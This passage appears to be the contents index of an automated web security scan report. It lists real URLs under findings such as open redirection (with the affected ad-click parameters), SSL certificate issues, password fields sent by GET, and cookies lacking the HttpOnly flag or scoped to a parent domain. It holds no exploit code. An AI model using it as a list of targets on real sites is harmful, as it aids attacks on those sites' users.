9.284. http://www.quantcast.com/top-sites/SH

9.285. http://www.quantcast.com/top-sites/SI

9.286. http://www.quantcast.com/top-sites/SJ

9.287. http://www.quantcast.com/top-sites/SK

9.288. http://www.quantcast.com/top-sites/SL

9.289. http://www.quantcast.com/top-sites/SM

9.290. http://www.quantcast.com/top-sites/SN

9.291. http://www.quantcast.com/top-sites/SO

9.292. http://www.quantcast.com/top-sites/SR

9.293. http://www.quantcast.com/top-sites/ST

9.294. http://www.quantcast.com/top-sites/SV

9.295. http://www.quantcast.com/top-sites/SY

9.296. http://www.quantcast.com/top-sites/SZ

9.297. http://www.quantcast.com/top-sites/TC

9.298. http://www.quantcast.com/top-sites/TD

9.299. http://www.quantcast.com/top-sites/TF

9.300. http://www.quantcast.com/top-sites/TG

9.301. http://www.quantcast.com/top-sites/TH

9.302. http://www.quantcast.com/top-sites/TJ

9.303. http://www.quantcast.com/top-sites/TK

9.304. http://www.quantcast.com/top-sites/TL

9.305. http://www.quantcast.com/top-sites/TM

9.306. http://www.quantcast.com/top-sites/TN

9.307. http://www.quantcast.com/top-sites/TO

9.308. http://www.quantcast.com/top-sites/TR

9.309. http://www.quantcast.com/top-sites/TT

9.310. http://www.quantcast.com/top-sites/TV

9.311. http://www.quantcast.com/top-sites/TW

9.312. http://www.quantcast.com/top-sites/TZ

9.313. http://www.quantcast.com/top-sites/UA

9.314. http://www.quantcast.com/top-sites/UG

9.315. http://www.quantcast.com/top-sites/UM

9.316. http://www.quantcast.com/top-sites/US

9.317. http://www.quantcast.com/top-sites/US/2

9.318. http://www.quantcast.com/top-sites/UY

9.319. http://www.quantcast.com/top-sites/UZ

9.320. http://www.quantcast.com/top-sites/VA

9.321. http://www.quantcast.com/top-sites/VC

9.322. http://www.quantcast.com/top-sites/VE

9.323. http://www.quantcast.com/top-sites/VG

9.324. http://www.quantcast.com/top-sites/VI

9.325. http://www.quantcast.com/top-sites/VN

9.326. http://www.quantcast.com/top-sites/VU

9.327. http://www.quantcast.com/top-sites/WF

9.328. http://www.quantcast.com/top-sites/WS

9.329. http://www.quantcast.com/top-sites/YE

9.330. http://www.quantcast.com/top-sites/YT

9.331. http://www.quantcast.com/top-sites/ZA

9.332. http://www.quantcast.com/top-sites/ZM

9.333. http://www.quantcast.com/top-sites/ZW

9.334. http://www.quantcast.com/tumblr.com

9.335. http://www.quantcast.com/twitpic.com

9.336. http://www.quantcast.com/twitter.com

9.337. http://www.quantcast.com/ups.com

9.338. http://www.quantcast.com/usps.com

9.339. http://www.quantcast.com/walmart.com

9.340. http://www.quantcast.com/washingtonpost.com

9.341. http://www.quantcast.com/weather.com

9.342. http://www.quantcast.com/weatherbug.com

9.343. http://www.quantcast.com/webmd.com

9.344. http://www.quantcast.com/wellsfargo.com

9.345. http://www.quantcast.com/whitepages.com

9.346. http://www.quantcast.com/wikia.com

9.347. http://www.quantcast.com/wikipedia.org

9.348. http://www.quantcast.com/windows.com

9.349. http://www.quantcast.com/wisegeek.com

9.350. http://www.quantcast.com/wordpress.com

9.351. http://www.quantcast.com/wunderground.com

9.352. http://www.quantcast.com/yahoo.com

9.353. http://www.quantcast.com/yellowpages.com

9.354. http://www.quantcast.com/yelp.com

9.355. http://www.quantcast.com/youtube.com

9.356. http://www.reputation.com/min/

9.357. http://www.sourceconference.com/blog/

10. SSL certificate

10.1. https://www.regonline.com/

10.2. https://www.metropcs.com/

10.3. https://www.coach.com/

10.4. https://www.reputation.com/

10.5. https://www.viglink.com/

11. Silverlight cross-domain policy

11.1. http://www.bing.com/clientaccesspolicy.xml

11.2. http://www.microsoft.com/clientaccesspolicy.xml

12. Password field submitted using GET method

13. Open redirection

13.1. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4daf8795a5218-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5Ef092e03a6a6f7233fddea1dba6682b68-ord%3D7517821204382926-afid%3D640610-dsid%3D640610-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D3-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006301d1zl1q1g06k9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf8795a5218 parameter]

13.2. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4daf87a1d3f17-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5Ed11447cd4f98bcabf1c42fff04582408-ord%3D8175912909209728-afid%3D526139-dsid%3D526139-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db00624ved011q1g0k4i%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf87a1d3f17 parameter]

13.3. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4daf878acfac9-_advid%3D50002316-_adid%3D5000038225-_crid%3D500027662-_aipid%3D201104201815-_ge_%3D1%5E2%5E4d0b2a340212dd6ac8de952f71f0f533-ord%3D8514925059862435-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1q1fzsk9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf878acfac9 parameter]

13.4. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4daf8797ad1bb-_advid%3D1394104-_adid%3D5000036707-_crid%3D500025973-_aipid%3D201104201815-_ge_%3D1%5E2%5E6c1afbb3fa1783526cdf7625a14a9edf-ord%3D586278107948601.2-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1q1g0ab9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf8797ad1bb parameter]

13.5. http://www.awin1.com/cread.php [Referer HTTP header]

13.6. http://www.bing.com/challenge [query parameter]

14. Cookie scoped to parent domain

14.1. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

14.2. http://www.4shared.com/images/blueBanner_plus.gif

14.3. http://www.4shared.com/images/index-premium-features.png

14.4. http://www.4shared.com/images/spacer.gif

14.5. http://www.admob.com/

14.6. http://www.barracudaware.com/

14.7. http://www.cudaeye.com/

14.8. https://www.infosecisland.com/blogview/11402-Cross-Site-Scripting-XSS-Some-Examples.html+xss/x26amp

14.9. https://www.infosecisland.com/blogview/12822-Spear-Phishing-Season-Is-Declared-Open.html

14.10. http://www.jcpenney.com/jcp/banners.asp

14.11. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

14.12. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

14.13. http://www.manta.com/mb_34_E33B9_000/refuse_systems

14.14. http://www.manta.com/member/register/

14.15. http://www.manta.com/profile/my-companies/select

14.16. http://www.opensource.org/licenses/gpl-license.php

14.17. http://www.opensource.org/licenses/mit-license.php

14.18. http://www.stumbleupon.com/submit

14.19. http://www.tomcatexpert.com/blog/x26amp

14.20. http://www.tomcatexpert.com/blogs/mthomas/x26amp

14.21. http://www4.jcpenney.com/jcp/freeship4u.aspx

14.22. http://www5.jcpenney.com/jcp/

14.23. http://www5.jcpenney.com/jcp/AddToBag.aspx

14.24. http://www5.jcpenney.com/jcp/bag.aspx

14.25. http://www5.jcpenney.com/jcp/bagaction.aspx

14.26. http://www.4shared.com/premium.jsp

14.27. http://www.4shared.com/signUpBox.jsp

14.28. http://www.4shared.com/signup.jsp

14.29. http://www.akamai.com/

14.30. http://www.bing.com/

14.31. http://www.bing.com/challenge

14.32. http://www.bing.com/local/details.aspx

14.33. http://www.bizographics.com/collect/

14.34. http://www.cisco.com/

14.35. http://www.cisco.com/en/US/docs/security/nac/guestserver/release_notes/20/gsrn20.html

14.36. http://www.cisco.com/en/US/prod/collateral/vpndevc/ps5707/ps8418/ps6128/product_data_sheet0900aecd806e98c9.html

14.37. http://www.cisco.com/en/US/products/products_security_advisory09186a0080b74114.shtml

14.38. https://www.demandstudios.com/application.html

14.39. https://www.demandstudios.com/verify.aspx

14.40. http://www.facebook.com/2008/fbml

14.41. http://www.facebook.com/BLane77

14.42. http://www.facebook.com/DOUCHE01

14.43. http://www.facebook.com/ESPNNewYork

14.44. http://www.facebook.com/JohnFerrell

14.45. http://www.facebook.com/KOMONews

14.46. http://www.facebook.com/SaMmFalK

14.47. http://www.facebook.com/angie.eronson

14.48. http://www.facebook.com/campaign/impression.php

14.49. http://www.facebook.com/campaign/landing.php

14.50. http://www.facebook.com/cdulitz

14.51. http://www.facebook.com/chester.mitre

14.52. http://www.facebook.com/chris.paulette

14.53. http://www.facebook.com/daryl.shelby

14.54. http://www.facebook.com/deejayeric908

14.55. http://www.facebook.com/deekron

14.56. http://www.facebook.com/haydn.long

14.57. http://www.facebook.com/highrock.singers

14.58. http://www.facebook.com/jill.hightower1

14.59. http://www.facebook.com/khristhianssenj

14.60. http://www.facebook.com/pages/ESPNNewYorkcom/109006945794439

14.61. http://www.facebook.com/pages/Glamcom/144180538945796

14.62. http://www.facebook.com/pages/Paul-Deanno-KOMO/164817400226610

14.63. http://www.facebook.com/pages/Shannon-ODonnell-KOMO/174655965888526

14.64. http://www.facebook.com/pages/Steve-Pool-KOMO/115354065200981

14.65. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

14.66. http://www.facebook.com/pauldeannokomo

14.67. http://www.facebook.com/profile.php

14.68. http://www.facebook.com/raymond.cree

14.69. http://www.facebook.com/scottskomo

14.70. http://www.facebook.com/sharer.php

14.71. http://www.facebook.com/stevepoolkomo

14.72. http://www.facebook.com/tracey.westerlund

14.73. http://www.facebook.com/viglink

14.74. https://www.facebook.com/ESPNNewYork

14.75. http://www.google.com/

14.76. http://www.google.com/aclk

14.77. http://www.google.com/advanced_search

14.78. http://www.google.com/bookmarks/mark

14.79. http://www.google.com/cse/home

14.80. http://www.google.com/finance

14.81. http://www.google.com/gen_204

14.82. http://www.google.com/history/optout

14.83. http://www.google.com/images

14.84. http://www.google.com/imghp

14.85. http://www.google.com/language_tools

14.86. http://www.google.com/mbd

14.87. http://www.google.com/prdhp

14.88. http://www.google.com/preferences

14.89. http://www.google.com/quality_form

14.90. http://www.google.com/realtime

14.91. http://www.google.com/search

14.92. http://www.google.com/webhp

14.93. http://www.linkedin.com/groups

14.94. http://www.mandiant.com/

14.95. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

14.96. http://www.meetup.com/San-Francisco-Blog-Club/

14.97. http://www.metropcs.com/

14.98. http://www.metropcs.com/ScriptResource.axd

14.99. http://www.metropcs.com/WebResource.axd

14.100. http://www.metropcs.com/assets/handlers/BannerHandler.ashx

14.101. http://www.metropcs.com/assets/images/chrisbrown_home.jpg

14.102. http://www.metropcs.com/assets/images/icon_myMetroMail.png

14.103. http://www.metropcs.com/assets/images/icon_vcpay.png

14.104. http://www.metropcs.com/assets/images/privacy/truste_seal_web.gif

14.105. http://www.metropcs.com/assets/js/masterscript.js

14.106. http://www.metropcs.com/assets/js/transmotionlink.js

14.107. http://www.metropcs.com/assets/v3/flash/homepage/phonerotator.swf

14.108. http://www.metropcs.com/assets/v3/images/bg_body.jpg

14.109. http://www.metropcs.com/assets/v3/images/footer/facebook.png

14.110. http://www.metropcs.com/assets/v3/images/footer/twitter.png

14.111. http://www.metropcs.com/assets/v3/images/footer/youtube.png

14.112. http://www.metropcs.com/assets/v3/images/icon_email_small.gif

14.113. http://www.metropcs.com/assets/v3/js/core/jquery.maskedinput-1.2.2.min.js

14.114. http://www.metropcs.com/assets/v3/js/core/jquery.mixform.js

14.115. http://www.metropcs.com/assets/v3/js/core/jquery.scrollcontrol.js

14.116. http://www.metropcs.com/assets/v3/js/core/jquery.throbber.min.js

14.117. http://www.metropcs.com/assets/v3/js/core/window_pop.js

14.118. http://www.metropcs.com/assets/v3/js/global.js

14.119. http://www.metropcs.com/assets/v3/js/mods/facebox.js

14.120. http://www.metropcs.com/assets/v3/js/mods/jquery-1.3.2.min.js

14.121. http://www.metropcs.com/assets/v3/js/mods/jquery.qtip.min.js

14.122. http://www.metropcs.com/assets/v3/js/mods/pngfix.js

14.123. http://www.metropcs.com/assets/v3/js/mods/prettyCheckboxes.js

14.124. http://www.metropcs.com/assets/v3/js/mods/prettyComments.js

14.125. http://www.metropcs.com/assets/v3/js/mods/prettyValidation.js

14.126. http://www.metropcs.com/assets/v3/js/mods/suckerfish.js

14.127. http://www.metropcs.com/assets/v3/js/mods/swfobject.js

14.128. http://www.metropcs.com/assets/v3/styles/default.css

14.129. http://www.metropcs.com/assets/v3/styles/page_level/StoreLocator.css

14.130. http://www.metropcs.com/assets/v3/styles/page_level/home.css

14.131. http://www.metropcs.com/foresee/foresee-trigger.js

14.132. https://www.metropcs.com/assets/images/icon_vcpay.png

14.133. https://www.metropcs.com/assets/v3/images/footer/facebook.png

14.134. https://www.metropcs.com/assets/v3/images/footer/twitter.png

14.135. https://www.metropcs.com/assets/v3/images/footer/youtube.png

14.136. http://www.newsvine.com/_wine/save

14.137. http://www.southparkstudios.com/account/login

14.138. http://www.yellowbook.com/profile/industrial-waste-services_1599831554.html

14.139. http://www.yellowbook.com/yellow-pages/

14.140. http://www.yelp.com/search

14.141. http://www.youtube.com/

14.142. http://www.youtube.com/results

14.143. http://www.youtube.com/user/4sharedTEAM

14.144. http://www.youtube.com/watch

14.145. http://www22.verizon.com/privacy/

14.146. http://www4.jcpenney.com/jcp/JCPRoute.aspx

14.147. http://www5.jcpenney.com/jcp/X6E.aspx

14.148. http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk=&udj=uf('a',%20577,%201298497076)

14.149. http://xads.zedo.com/ads3/a

15. Cookie without HttpOnly flag set

15.1. http://www.4shared.com/

15.2. http://www.4shared.com/advertise/

15.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

15.4. http://www.4shared.com/advertise/banners/desktop/728x90.jsp

15.5. http://www.4shared.com/contact.jsp

15.6. http://www.4shared.com/desktop/

15.7. http://www.4shared.com/enter.jsp

15.8. http://www.4shared.com/faq.jsp

15.9. http://www.4shared.com/icons/16x16/

15.10. http://www.4shared.com/images/blueBanner_plus.gif

15.11. http://www.4shared.com/images/index-premium-features.png

15.12. http://www.4shared.com/images/spacer.gif

15.13. http://www.4shared.com/index.jsp

15.14. http://www.4shared.com/js/loginScript.jsp

15.15. http://www.4shared.com/js/signup-script.jsp

15.16. http://www.4shared.com/loginBox.jsp

15.17. http://www.4shared.com/m/android.jsp

15.18. http://www.4shared.com/m/blackberry.jsp

15.19. http://www.4shared.com/m/symbian.jsp

15.20. http://www.4shared.com/main/translate/setLang.jsp

15.21. http://www.4shared.com/oauth/startFacebookLogin.jsp

15.22. http://www.4shared.com/premium.jsp

15.23. http://www.4shared.com/press_room/

15.24. http://www.4shared.com/privacy.jsp

15.25. http://www.4shared.com/remindPassword.jsp

15.26. http://www.4shared.com/resellers.jsp

15.27. http://www.4shared.com/signUpBox.jsp

15.28. http://www.4shared.com/signup.jsp

15.29. http://www.4shared.com/terms.jsp

15.30. http://www.4shared.com/toolbar/

15.31. http://www.admob.com/

15.32. http://www.b3b.ch/2011/03/27/rien-ne-va-plus-dans-la-securite-linfoguerre-est-declaree/

15.33. http://www.barracudanetworks.com/ns/purchase/

15.34. http://www.barracudaware.com/

15.35. http://www.bizfind.us/

15.36. http://www.bizfind.us/CAPTCHA/CAPTCHA_image.asp

15.37. http://www.bizfind.us/CAPTCHA/CAPTCHA_image.asp

15.38. http://www.bizfind.us/cat/39/1/34183/philadelphia.aspx

15.39. http://www.bluefountainmedia.com/

15.40. http://www.cmswire.com/events/item/source-boston-006828.php

15.41. http://www.coach.com/online/handbags/-poppy_bags-10551-10051-5000000000000189652-en

15.42. http://www.coach.com/online/handbags/COABannerCodeDirectorCmd

15.43. http://www.coach.com/online/handbags/ContactUsView

15.44. http://www.coach.com/online/handbags/MensLandingView

15.45. http://www.coach.com/online/handbags/OrderStatusView

15.46. http://www.coach.com/online/handbags/PopUnderView

15.47. http://www.coach.com/online/handbags/ShoppingCartView

15.48. http://www.coach.com/online/handbags/SiteMapView

15.49. http://www.coach.com/online/handbags/StoreLocatorView

15.50. http://www.coach.com/online/handbags/UserRegistrationGetView

15.51. http://www.coach.com/online/handbags/clickatcoach-10551-10051-en-SMCO0002

15.52. https://www.coach.com/online/handbags/PopUnderView

15.53. http://www.commercialdumpster.com/

15.54. http://www.comodo.com/business-security/digital-certificates/ssl-certificates.php

15.55. http://www.contextweb.com/

15.56. http://www.cudaeye.com/

15.57. http://www.dyn-web.com/

15.58. http://www.emailmeform.com/builder/captcha/index/b1b2823bec060bcaee221750e259c212

15.59. http://www.espn.com.au/

15.60. http://www.espnshop.com/family/index.jsp

15.61. http://www.fismacenter.com/

15.62. http://www.gfi.com/

15.63. http://www.glam.com/

15.64. http://www.infosecleaders.com/

15.65. http://www.insideup.com/captcha.html

15.66. http://www.insideup.com/login.html

15.67. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

15.68. http://www.instantssl.it/

15.69. http://www.issa.org/

15.70. http://www.jcpenney.com/jcp/banners.asp

15.71. http://www.jcpstoreads.com/jcpenney/

15.72. http://www.jcpstoreads.com/jcpenney/default.aspx

15.73. http://www.kiala.fr/

15.74. http://www.komo4rewards.com/index.htm

15.75. http://www.linkedin.com/groups

15.76. http://www.macraesbluebook.com/search/company.cfm

15.77. http://www.macraesbluebook.com/search/product_company_list.cfm

15.78. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

15.79. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

15.80. http://www.manta.com/mb_34_E33B9_000/refuse_systems

15.81. http://www.manta.com/member/register/

15.82. http://www.manta.com/profile/my-companies/select

15.83. http://www.navcen.uscg.gov/

15.84. http://www.ncircle.com/

15.85. http://www.opensource.org/licenses/gpl-license.php

15.86. http://www.opensource.org/licenses/mit-license.php

15.87. http://www.outsourcermarketplace.com/faq.php

15.88. http://www.packetmotion.com/

15.89. http://www.paper-source.com/cgi-bin/paper/locations/ma_boston.html

15.90. http://www.poisonivy-rat.com/

15.91. http://www.quantcast.com/4shared.com

15.92. http://www.quantcast.com/about.com

15.93. http://www.quantcast.com/accuweather.com

15.94. http://www.quantcast.com/ad4game.com

15.95. http://www.quantcast.com/adobe.com

15.96. http://www.quantcast.com/allrecipes.com

15.97. http://www.quantcast.com/amazon.com

15.98. http://www.quantcast.com/ancestry.com

15.99. http://www.quantcast.com/angelfire.com

15.100. http://www.quantcast.com/answerbag.com

15.101. http://www.quantcast.com/answers.com

15.102. http://www.quantcast.com/aol.com

15.103. http://www.quantcast.com/apple.com

15.104. http://www.quantcast.com/articlesbase.com

15.105. http://www.quantcast.com/ask.com

15.106. http://www.quantcast.com/askmen.com

15.107. http://www.quantcast.com/associatedcontent.com

15.108. http://www.quantcast.com/att.com

15.109. http://www.quantcast.com/autotrader.com

15.110. http://www.quantcast.com/babycenter.com

15.111. http://www.quantcast.com/bankofamerica.com

15.112. http://www.quantcast.com/barnesandnoble.com

15.113. http://www.quantcast.com/bbc.co.uk

15.114. http://www.quantcast.com/bestbuy.com

15.115. http://www.quantcast.com/bing.com

15.116. http://www.quantcast.com/bizrate.com

15.117. http://www.quantcast.com/bleacherreport.com

15.118. http://www.quantcast.com/blogger.com

15.119. http://www.quantcast.com/blogspot.com

15.120. http://www.quantcast.com/blurtit.com

15.121. http://www.quantcast.com/borders.com

15.122. http://www.quantcast.com/boreme.com

15.123. http://www.quantcast.com/break.com

15.124. http://www.quantcast.com/brothersoft.com

15.125. http://www.quantcast.com/buycheapr.com

15.126. http://www.quantcast.com/ca.gov

15.127. http://www.quantcast.com/candystand.com

15.128. http://www.quantcast.com/capitalone.com

15.129. http://www.quantcast.com/careerbuilder.com

15.130. http://www.quantcast.com/causes.com

15.131. http://www.quantcast.com/cbsnews.com

15.132. http://www.quantcast.com/cbssports.com

15.133. http://www.quantcast.com/chacha.com

15.134. http://www.quantcast.com/chase.com

15.135. http://www.quantcast.com/city-data.com

15.136. http://www.quantcast.com/cnbc.com

15.137. http://www.quantcast.com/cnet.com

15.138. http://www.quantcast.com/cnn.com

15.139. http://www.quantcast.com/comcast.com

15.140. http://www.quantcast.com/comcast.net

15.141. http://www.quantcast.com/coolmath-games.com

15.142. http://www.quantcast.com/craigslist.org

15.143. http://www.quantcast.com/dailymotion.com

15.144. http://www.quantcast.com/dell.com

15.145. http://www.quantcast.com/deviantart.com

15.146. http://www.quantcast.com/digg.com

15.147. http://www.quantcast.com/directv.com

15.148. http://www.quantcast.com/docstoc.com

15.149. http://www.quantcast.com/drudgereport.com

15.150. http://www.quantcast.com/drugs.com

15.151. http://www.quantcast.com/ebay.com

15.152. http://www.quantcast.com/edmunds.com

15.153. http://www.quantcast.com/ehow.com

15.154. http://www.quantcast.com/etsy.com

15.155. http://www.quantcast.com/evite.com

15.156. http://www.quantcast.com/ew.com

15.157. http://www.quantcast.com/examiner.com

15.158. http://www.quantcast.com/expedia.com

15.159. http://www.quantcast.com/ezinearticles.com

15.160. http://www.quantcast.com/facebook.com

15.161. http://www.quantcast.com/fedex.com

15.162. http://www.quantcast.com/filestube.com

15.163. http://www.quantcast.com/filmannex.com

15.164. http://www.quantcast.com/fixya.com

15.165. http://www.quantcast.com/flickr.com

15.166. http://www.quantcast.com/foodnetwork.com

15.167. http://www.quantcast.com/formspring.me

15.168. http://www.quantcast.com/foxnews.com

15.169. http://www.quantcast.com/gawker.com

15.170. http://www.quantcast.com/global/personalHeader

15.171. http://www.quantcast.com/go.com

15.172. http://www.quantcast.com/godaddy.com

15.173. http://www.quantcast.com/google.com

15.174. http://www.quantcast.com/grindtv.com

15.175. http://www.quantcast.com/healthgrades.com

15.176. http://www.quantcast.com/homedepot.com

15.177. http://www.quantcast.com/howstuffworks.com

15.178. http://www.quantcast.com/hp.com

15.179. http://www.quantcast.com/hubpages.com

15.180. http://www.quantcast.com/huffingtonpost.com

15.181. http://www.quantcast.com/hulu.com

15.182. http://www.quantcast.com/ign.com

15.183. http://www.quantcast.com/imdb.com

15.184. http://www.quantcast.com/indeed.com

15.185. http://www.quantcast.com/intuit.com

15.186. http://www.quantcast.com/irs.gov

15.187. http://www.quantcast.com/jcpenney.com

15.188. http://www.quantcast.com/justanswer.com

15.189. http://www.quantcast.com/kohls.com

15.190. http://www.quantcast.com/komonews.com

15.191. http://www.quantcast.com/legacy.com

15.192. http://www.quantcast.com/linkedin.com

15.193. http://www.quantcast.com/live.com

15.194. http://www.quantcast.com/local.com

15.195. http://www.quantcast.com/localpages.com

15.196. http://www.quantcast.com/lowes.com

15.197. http://www.quantcast.com/manta.com

15.198. http://www.quantcast.com/mapquest.com

15.199. http://www.quantcast.com/match.com

15.200. http://www.quantcast.com/mayoclinic.com

15.201. http://www.quantcast.com/medicinenet.com

15.202. http://www.quantcast.com/merchantcircle.com

15.203. http://www.quantcast.com/merriam-webster.com

15.204. http://www.quantcast.com/metacafe.com

15.205. http://www.quantcast.com/microsoft.com

15.206. http://www.quantcast.com/miniclip.com

15.207. http://www.quantcast.com/monster.com

15.208. http://www.quantcast.com/moviefone.com

15.209. http://www.quantcast.com/msn.com

15.210. http://www.quantcast.com/mtv.com

15.211. http://www.quantcast.com/myspace.com

15.212. http://www.quantcast.com/nbc.com

15.213. http://www.quantcast.com/netflix.com

15.214. http://www.quantcast.com/nfl.com

15.215. http://www.quantcast.com/nih.gov

15.216. http://www.quantcast.com/noaa.gov

15.217. http://www.quantcast.com/norton.com

15.218. http://www.quantcast.com/nydailynews.com

15.219. http://www.quantcast.com/nytimes.com

15.220. http://www.quantcast.com/overstock.com

15.221. http://www.quantcast.com/pandora.com

15.222. http://www.quantcast.com/paypal.com

15.223. http://www.quantcast.com/people.com

15.224. http://www.quantcast.com/photobucket.com

15.225. http://www.quantcast.com/planner

15.226. http://www.quantcast.com/pogo.com

15.227. http://www.quantcast.com/profile-index

15.228. http://www.quantcast.com/profile/performance

15.229. http://www.quantcast.com/pronto.com

15.230. http://www.quantcast.com/reddit.com

15.231. http://www.quantcast.com/reference.com

15.232. http://www.quantcast.com/righthealth.com

15.233. http://www.quantcast.com/rockyou.com

15.234. http://www.quantcast.com/rr.com

15.235. http://www.quantcast.com/scribd.com

15.236. http://www.quantcast.com/searchassist.com

15.237. http://www.quantcast.com/sears.com

15.238. http://www.quantcast.com/shopathome.com

15.239. http://www.quantcast.com/shoplocal.com

15.240. http://www.quantcast.com/shopping.com

15.241. http://www.quantcast.com/shopzilla.com

15.242. http://www.quantcast.com/simplyhired.com

15.243. http://www.quantcast.com/smileycentral.com

15.244. http://www.quantcast.com/softonic.com

15.245. http://www.quantcast.com/spokeo.com

15.246. http://www.quantcast.com/squidoo.com

15.247. http://www.quantcast.com/staples.com

15.248. http://www.quantcast.com/suite101.com

15.249. http://www.quantcast.com/superpages.com

15.250. http://www.quantcast.com/target.com

15.251. http://www.quantcast.com/thefind.com

15.252. http://www.quantcast.com/thesaurus.com

15.253. http://www.quantcast.com/time.com

15.254. http://www.quantcast.com/tmz.com

15.255. http://www.quantcast.com/top-sites

15.256. http://www.quantcast.com/top-sites-1

15.257. http://www.quantcast.com/top-sites/AD

15.258. http://www.quantcast.com/top-sites/AE

15.259. http://www.quantcast.com/top-sites/AF

15.260. http://www.quantcast.com/top-sites/AG

15.261. http://www.quantcast.com/top-sites/AI

15.262. http://www.quantcast.com/top-sites/AL

15.263. http://www.quantcast.com/top-sites/AM

15.264. http://www.quantcast.com/top-sites/AN

15.265. http://www.quantcast.com/top-sites/AO

15.266. http://www.quantcast.com/top-sites/AQ

15.267. http://www.quantcast.com/top-sites/AR

15.268. http://www.quantcast.com/top-sites/AS

15.269. http://www.quantcast.com/top-sites/AT

15.270. http://www.quantcast.com/top-sites/AU

15.271. http://www.quantcast.com/top-sites/AW

15.272. http://www.quantcast.com/top-sites/AX

15.273. http://www.quantcast.com/top-sites/AZ

15.274. http://www.quantcast.com/top-sites/BA

15.275. http://www.quantcast.com/top-sites/BB

15.276. http://www.quantcast.com/top-sites/BD

15.277. http://www.quantcast.com/top-sites/BE

15.278. http://www.quantcast.com/top-sites/BF

15.279. http://www.quantcast.com/top-sites/BG

15.280. http://www.quantcast.com/top-sites/BH

15.281. http://www.quantcast.com/top-sites/BI

15.282. http://www.quantcast.com/top-sites/BJ

15.283. http://www.quantcast.com/top-sites/BM

15.284. http://www.quantcast.com/top-sites/BN

15.285. http://www.quantcast.com/top-sites/BO

15.286. http://www.quantcast.com/top-sites/BR

15.287. http://www.quantcast.com/top-sites/BS

15.288. http://www.quantcast.com/top-sites/BT

15.289. http://www.quantcast.com/top-sites/BV

15.290. http://www.quantcast.com/top-sites/BW

15.291. http://www.quantcast.com/top-sites/BY

15.292. http://www.quantcast.com/top-sites/BZ

15.293. http://www.quantcast.com/top-sites/CA

15.294. http://www.quantcast.com/top-sites/CC

15.295. http://www.quantcast.com/top-sites/CD

15.296. http://www.quantcast.com/top-sites/CF

15.297. http://www.quantcast.com/top-sites/CG

15.298. http://www.quantcast.com/top-sites/CH

15.299. http://www.quantcast.com/top-sites/CI

15.300. http://www.quantcast.com/top-sites/CK

15.301. http://www.quantcast.com/top-sites/CL

15.302. http://www.quantcast.com/top-sites/CM

15.303. http://www.quantcast.com/top-sites/CN

15.304. http://www.quantcast.com/top-sites/CO

15.305. http://www.quantcast.com/top-sites/CR

15.306. http://www.quantcast.com/top-sites/CU

15.307. http://www.quantcast.com/top-sites/CV

15.308. http://www.quantcast.com/top-sites/CX

15.309. http://www.quantcast.com/top-sites/CY

15.310. http://www.quantcast.com/top-sites/CZ

15.311. http://www.quantcast.com/top-sites/DE

15.312. http://www.quantcast.com/top-sites/DJ

15.313. http://www.quantcast.com/top-sites/DK

15.314. http://www.quantcast.com/top-sites/DM

15.315. http://www.quantcast.com/top-sites/DO

15.316. http://www.quantcast.com/top-sites/DZ

15.317. http://www.quantcast.com/top-sites/EC

15.318. http://www.quantcast.com/top-sites/EE

15.319. http://www.quantcast.com/top-sites/EG

15.320. http://www.quantcast.com/top-sites/EH

15.321. http://www.quantcast.com/top-sites/ER

15.322. http://www.quantcast.com/top-sites/ES

15.323. http://www.quantcast.com/top-sites/ET

15.324. http://www.quantcast.com/top-sites/FI

15.325. http://www.quantcast.com/top-sites/FJ

15.326. http://www.quantcast.com/top-sites/FK

15.327. http://www.quantcast.com/top-sites/FM

15.328. http://www.quantcast.com/top-sites/FO

15.329. http://www.quantcast.com/top-sites/FR

15.330. http://www.quantcast.com/top-sites/GA

15.331. http://www.quantcast.com/top-sites/GB

15.332. http://www.quantcast.com/top-sites/GD

15.333. http://www.quantcast.com/top-sites/GE

15.334. http://www.quantcast.com/top-sites/GF

15.335. http://www.quantcast.com/top-sites/GG

15.336. http://www.quantcast.com/top-sites/GH

15.337. http://www.quantcast.com/top-sites/GI

15.338. http://www.quantcast.com/top-sites/GL

15.339. http://www.quantcast.com/top-sites/GM

15.340. http://www.quantcast.com/top-sites/GN

